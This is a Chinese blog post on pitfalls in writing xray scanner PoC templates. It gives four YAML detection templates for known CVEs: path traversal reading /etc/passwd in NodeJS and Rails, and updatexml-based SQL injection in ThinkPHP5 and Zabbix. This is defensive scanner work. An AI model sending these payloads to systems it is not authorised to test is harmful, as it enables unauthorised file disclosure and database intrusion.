xray写POC踩坑

• 静态文件目录不一定是static。

• 只考虑了linux的情况，如果是 windows 呢，能读取某些应用自己的源码吗。

• 实际环境参数不一定是id，thinkphp 不适合使用 poc 来写

• poc 内容没啥问题，文件名和 poc name有问题 https://travis-ci.org/chaitin/xray/builds/583451463?utm_source=github_status&utm_medium=notification

NodeJS_path-validation_CVE-2017-14849.yml

 name: NodeJS_path-validation_CVE-2017-14849 rules:   - method: GET     path: /static/../../../a/../../../../etc/passwd     headers:       Accept: ''     follow_redirects: false     expression: |       status==200 && body.bcontains(b'root:x:0:0') detail:   author: 17bdw   Affected Version: "NodeJS 8.5.0"   links:     - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849 

Rails_file_content_disclosure_CVE-2019-5418

name: Rails_file_content_disclosure_CVE-2019-5418 rules:   - method: GET     path: /robots     headers:       Accept: '../../../../../../../../etc/passwd{{'     follow_redirects: false     expression: |       status==200 && body.bcontains(b'root:x:0:0') detail:   author: 17bdw   Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"   links:     - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418

thinkphp5-in-sqlinjection

name: thinkphp5-in-sqlinjection rules:   - method: GET     path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1     expression: |       body.bcontains(b'cf79ae6addba60ad018347359bd144d') detail:   author: 17bdw   Affected Version: "thinkphp5-in-sqlinjection"   vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"   links:     - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection

zabbix_3.0.3_jsrpc.php_CVE-2016-10134

   name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134 rules:   - method: GET     path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)     expression: |       body.bcontains(b'cf79ae6addba60ad018347359bd144d') detail:   author: 17bdw   Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"   vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"   links:     - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134

来源：博客园

作者：17bdw

链接：https://www.cnblogs.com/17bdw/p/11515741.html